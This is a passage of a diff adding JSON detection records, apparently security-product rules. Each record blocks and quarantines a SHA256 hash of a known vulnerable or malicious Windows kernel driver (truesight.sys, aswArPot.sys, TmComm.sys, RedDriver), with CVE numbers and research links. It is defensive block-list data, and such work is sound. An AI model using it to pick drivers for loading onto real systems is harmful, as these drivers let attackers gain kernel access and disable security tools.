+ "hl_testing_start_time": "2026-03-23T11:45:29.974934Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb21a13819bf295f34f5b34e3e566d25d880b045831e90ff610daf9e8b1f15cd",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "426791a9-29ef-59b9-9b1d-72523bf8f27c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985933Z",
+ "creation_date": "2026-03-23T11:45:29.985935Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985941Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f02aed3750bc6a924c75e774404f259f721d8f4081ed68aa01cf73ca5430f85",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "426ba44c-104d-5045-9687-7fc5ab06e359",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810576Z",
+ "creation_date": "2026-03-23T11:45:31.810578Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810583Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a65893522643740e9ba6032804eed874dc06a7a4102cf77d6a7817db77a5201",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42789297-8eb3-597e-9890-98bfe53563cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978615Z",
+ "creation_date": "2026-03-23T11:45:29.978617Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978623Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37dde6bd8a7a36111c3ac57e0ac20bbb93ce3374d0852bcacc9a2c8c8c30079e",
+ "comment": "Vulnerable Kernel Driver (aka bwrsh.sys) [https://www.loldrivers.io/drivers/974de971-1f78-47b9-8049-6c34f294acd5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "428ec23c-78ac-5bf2-b728-193dd466f694",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834578Z",
+ "creation_date": "2026-03-23T11:45:30.834581Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834590Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9a51d54ff081f05c3ec8edb2ec962bd65551b604c8ec958d0fd7ffbef9c6767",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "429b420e-2d25-56c7-970a-2e23c0b75434",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823590Z",
+ "creation_date": "2026-03-23T11:45:30.823592Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823598Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46e6d35814d232f0463bae3e1d62e1223712ff2332381ba57b81b17d28094991",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42c8f827-c7c8-5780-90ec-b0ef4a4894d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816265Z",
+ "creation_date": "2026-03-23T11:45:31.816269Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816276Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6747ddf15cb0b7e570b67b030d999e300ad20d09f469076309f402cc89e838b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42d3ff0b-4f0f-5c97-aaaf-e318986da366",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983561Z",
+ "creation_date": "2026-03-23T11:45:29.983562Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983568Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fcdfe570e6dc6e768ef75138033d9961f78045adca53beb6fdb520f6417e0df1",
+ "comment": "Vulnerable Kernel Driver (aka cpupress.sys) [https://www.loldrivers.io/drivers/c0645f0f-9b97-4fe9-811e-2e45c250c9ef/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42d66d37-8a8b-5e53-b993-6db4b13b5b8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495004Z",
+ "creation_date": "2026-03-23T11:45:31.495006Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495012Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96d63d9e47520118cabac54ebd80b264e9f61425a2ddef2efb0433ef3ba4538e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42d6ebb2-3e20-5065-9705-08cdd285cca9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835267Z",
+ "creation_date": "2026-03-23T11:45:30.835270Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835279Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "95cbd3d9f485a1e5a9a24d819e21b89bcb576a937bd9b29e76bf2fd36d9abf3b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42db1acf-3baa-559d-92ac-843995acbd49",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820408Z",
+ "creation_date": "2026-03-23T11:45:30.820410Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820415Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c490d6c0844f59fdb4aa850a06e283fbf5e5b6ac20ff42ead03d549d8ae1c01b",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42e8fdf9-318f-53ee-bccf-8bf7eddcb29b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471926Z",
+ "creation_date": "2026-03-23T11:45:31.471929Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471938Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1bb41517da813467dc2bc6ba3b0edfc572685b2829a4f53dedf9003ed7873585",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42ef1fb6-5792-5e4f-bf71-bef9e3487763",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832315Z",
+ "creation_date": "2026-03-23T11:45:30.832317Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832323Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28026b2499bdaa4a19ed896e4bd77adb1a00b7f0575903dad25700025e588bfd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42fc1784-da1a-533d-9023-3091c9178eca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144890Z",
+ "creation_date": "2026-03-23T11:45:31.144892Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "277c0ad0253ae2b95029b15a1de09347ad79504e1895cd7f3d8f4301941840ff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "43090516-aae3-540a-8c34-e2b12cb654cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823936Z",
+ "creation_date": "2026-03-23T11:45:30.823938Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823951Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c23d427b9e2f82b2e76990423d71302347eec638291d316162848ce5c8c9e127",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "431e8288-f2d1-5673-8d3b-0f60db8ec7f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968613Z",
+ "creation_date": "2026-03-23T11:45:29.968615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968621Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4da08c0681fbe028b60a1eaf5cb8890bd3eba4d0e6a8b976495ddcd315e147ba",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "43339524-6517-5cdc-a2ce-4cd107c93ec0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461697Z",
+ "creation_date": "2026-03-23T11:45:30.461700Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461708Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7afdb552a7fa25dd716fe3a55c988a59d120e78f9ee95067f31901f51987ab8d",
+ "comment": "Vulnerable Kernel Driver (aka titidrv.sys) [https://www.loldrivers.io/drivers/705facba-b595-41dd-86a6-93aefe6a6234/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4338542b-c92f-57fb-ac09-e7dde9fcf460",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819071Z",
+ "creation_date": "2026-03-23T11:45:30.819073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819078Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93cdc6e885459d95d5e9d6b2ee979e5cad44af1f57bca3947d594847cfbd5829",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4368beaf-8942-5979-8455-56b6fa943495",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977934Z",
+ "creation_date": "2026-03-23T11:45:29.977936Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977949Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "58c071cfe72e9ee867bba85cbd0abe72eb223d27978d6f0650d0103553839b59",
+ "comment": "Vulnerable Kernel Driver (aka LgDCatcher.sys) [https://www.loldrivers.io/drivers/a8e999ee-746f-4788-9102-c1d3d2914f56/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "438f0b07-003e-5208-9167-636191eb5477",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140132Z",
+ "creation_date": "2026-03-23T11:45:31.140135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140140Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46bbd4f34a828cd453ccafedb8b8324c8932ad364cbeb976cd246ad87a235335",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "439744de-d70a-5c52-9d5a-80dc09625405",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473357Z",
+ "creation_date": "2026-03-23T11:45:31.473361Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473371Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "08eb3cc0078e0cb5efa0db9840c9b50740fbc6e00c7463bd876bb2623d6f6cf5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "439d9a33-4f95-5e9b-b3b2-348f4d457193",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157314Z",
+ "creation_date": "2026-03-23T11:45:31.157317Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157323Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16ab022a72256fdf002fe69d9a15867c6bc710f67aacf8bd15a5518daee07862",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "43a57e7b-1e6a-5e78-ba70-9bfe97a1867b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613735Z",
+ "creation_date": "2026-03-23T11:45:29.613737Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613743Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8",
